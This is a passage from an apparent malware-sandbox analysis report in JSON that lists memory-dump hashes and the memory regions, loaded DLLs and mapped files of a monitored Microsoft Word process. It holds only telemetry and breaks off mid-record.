"ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d6d1effd19c050232843fd3deaad88af13eacea8", "sha256_hash": "9a2e3ea5754326d8290791f8af24c6ad07b428ffb94a50f5ac5c483c73eb0892", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001700-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "filename": "process_00000008-region_00001700-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "id": "proc_dump_389", "md5_hash": "6eeea0bcbc21bd1c0d7f0d6ae3488f7b", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fad191d56abe255a03a7b4b3b641fcfa8a4f81fe", "sha256_hash": "938a68694e4495227ebc925be61a20adb5c6c82d7dd57cc67a2717e2f9f2bf70", "size": 1024000, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001701-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "filename": "process_00000008-region_00001701-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "id": "proc_dump_390", "md5_hash": "caf76e9dd8864dfb7d729847f3595e80", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "71745f0f20bf18b3813fbb1a30eed8d41dc1d51d", "sha256_hash": "f113bc4b90aa0447b7992c2783d7c3b16d63f0e65e2c54c6e93ba833e8e0c667", "size": 1175552, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001704-addr_0x00000000003a0000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000008-region_00001704-addr_0x00000000003a0000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_391", "md5_hash": "6922782598ff8024119de6c9a43b8456", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9e5c7d2fa859a2a36478044399b3c6a88a94ba70", "sha256_hash": "043b95b9dc480d4c2d4b61c432a1a6b2abb004b01b03d1d385d011417ef9ae1a", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001721-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001721-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_392", "md5_hash": "663e0c81aa5e0a3ff2a43da751ac3ea6", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e73f43d3b9108b46aa594a997edc25f4aa778b3a", "sha256_hash": "83341888a1a94ed307472f9945ea15735d3580b3043db1b990ac64f5eda31432", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001722-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001722-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_393", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001726-addr_0x0000000000210000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000008-region_00001726-addr_0x0000000000210000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_394", "md5_hash": "ee1812c61c48013f25feca42b665162d", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fc9b63e1436430541b88c12676a684e38aa67e7a", "sha256_hash": "3f1e7f474446b673f266b5e203494f4da0c63d371ef092900fd47faa10c384d0", "size": 65536, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_133", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_134", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_135", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_137", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_138", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_139", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_140", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_141", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1077247, "entry_point": 0, "filename": null, "id": "region_142", "name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1122303, "entry_point": 0, "filename": null, "id": "region_143", "name": "pagefile_0x0000000000110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1114112, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_144", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1318911, "entry_point": 0, "filename": null, "id": "region_146", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": "region_147", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1519615, "entry_point": 0, "filename": null, "id": "region_149", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_150", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_151", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:09.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2699263, "entry_point": 0, "filename": null, "id": "region_152", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2764799, "entry_point": 0, "filename": null, "id": "region_153", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2830335, "entry_point": 0, "filename": null, "id": "region_154", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2895871, "entry_point": 0, "filename": null, "id": "region_155", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_156", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3284991, "entry_point": 0, "filename": null, "id": "region_157", "name": "pagefile_0x0000000000320000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3276800, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_158", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 7241727, "entry_point": 0, "filename": null, "id": "region_160", "name": "pagefile_0x0000000000560000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5636096, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 8851455, "entry_point": 0, "filename": null, "id": "region_161", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 29884415, "entry_point": 0, "filename": null, "id": "region_162", "name": "pagefile_0x0000000000880000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8912896, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 32829439, "entry_point": 29884416, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_163", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 29884416, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 36974591, "entry_point": 0, "filename": null, "id": "region_164", "name": "pagefile_0x0000000001f50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32833536, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37027840, "type": "region", "version": 1 }, "end_va": 38076415, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x0000000002350000", "norm_filename": null, "region_type": "private_memory", "start_va": 37027840, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 38989823, "entry_point": 0, "filename": null, "id": "region_166", "name": "pagefile_0x0000000002450000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38076416, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 39059456, "type": "region", "version": 1 }, "end_va": 39124991, "entry_point": 0, "filename": null, "id": "region_167", "name": "private_0x0000000002540000", "norm_filename": null, "region_type": "private_memory", "start_va": 39059456, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39321600, "type": "region", "version": 1 }, "end_va": 39325695, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x0000000002580000", "norm_filename": null, "region_type": "private_memory", "start_va": 39321600, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 40435711, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 40435712, "type": "region", "version": 1 }, "end_va": 40959999, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x0000000002690000", "norm_filename": null, "region_type": "private_memory", "start_va": 40435712, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 41439231, "entry_point": 0, "filename": null, "id": "region_171", "name": "pagefile_0x0000000002780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41418752, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41484288, "type": "region", "version": 1 }, "end_va": 41488383, "entry_point": 0, "filename": null, "id": "region_172", "name": "pagefile_0x0000000002790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41484288, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41549824, "type": "region", "version": 1 }, "end_va": 41553919, "entry_point": 0, "filename": null, "id": "region_173", "name": "pagefile_0x00000000027a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41549824, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 41615360, "type": "region", "version": 1 }, "end_va": 41619455, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x00000000027b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41615360, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 41680896, "type": "region", "version": 1 }, "end_va": 42729471, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x00000000027c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41680896, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 42729472, "type": "region", "version": 1 }, "end_va": 43515903, "entry_point": 42729472, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_176", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 42729472, "timestamp": "00:00:09.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 43515904, "type": "region", "version": 1 }, "end_va": 43524095, "entry_point": 0, "filename": null, "id": "region_177", "name": "pagefile_0x0000000002980000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43515904, "timestamp": "00:00:09.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 43802623, "entry_point": 43581440, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_178", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 43581440, "timestamp": "00:00:09.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 43909119, "entry_point": 0, "filename": null, "id": "region_179", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:00:09.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43909120, "type": "region", "version": 1 }, "end_va": 44957695, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x00000000029e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43909120, "timestamp": "00:00:09.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 44957696, "type": "region", "version": 1 }, "end_va": 44961791, "entry_point": 44957696, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_181", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 44957696, "timestamp": "00:00:09.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 45023232, "type": "region", "version": 1 }, "end_va": 45174783, "entry_point": 45023232, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db", "id": "region_182", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db", "region_type": "memory_mapped_file", "start_va": 45023232, "timestamp": "00:00:09.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 46268416, "type": "region", "version": 1 }, "end_va": 48365567, "entry_point": 0, "filename": null, "id": "region_183", "name": "private_0x0000000002c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 46268416, "timestamp": "00:00:09.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 48365568, "type": "region", "version": 1 }, "end_va": 48369663, "entry_point": 0, "filename": null, "id": "region_184", "name": "pagefile_0x0000000002e20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 48365568, "timestamp": "00:00:09.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 48431104, "type": "region", "version": 1 }, "end_va": 48439295, "entry_point": 0, "filename": null, "id": "region_185", "name": "pagefile_0x0000000002e30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 48431104, "timestamp": "00:00:09.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 48496640, "type": "region", "version": 1 }, "end_va": 48500735, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000002e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 48496640, "timestamp": "00:00:09.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 48562176, "type": "region", "version": 1 }, "end_va": 48631807, "entry_point": 48562176, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_187", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 48562176, "timestamp": "00:00:09.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 48693248, "type": "region", "version": 1 }, "end_va": 48824319, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x0000000002e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 48693248, "timestamp": "00:00:09.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 48824320, "type": "region", "version": 1 }, "end_va": 48844799, "entry_point": 48824320, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll", "id": "region_189", "name": "onbttnwd.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll", "region_type": "memory_mapped_file", "start_va": 48824320, "timestamp": "00:00:09.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 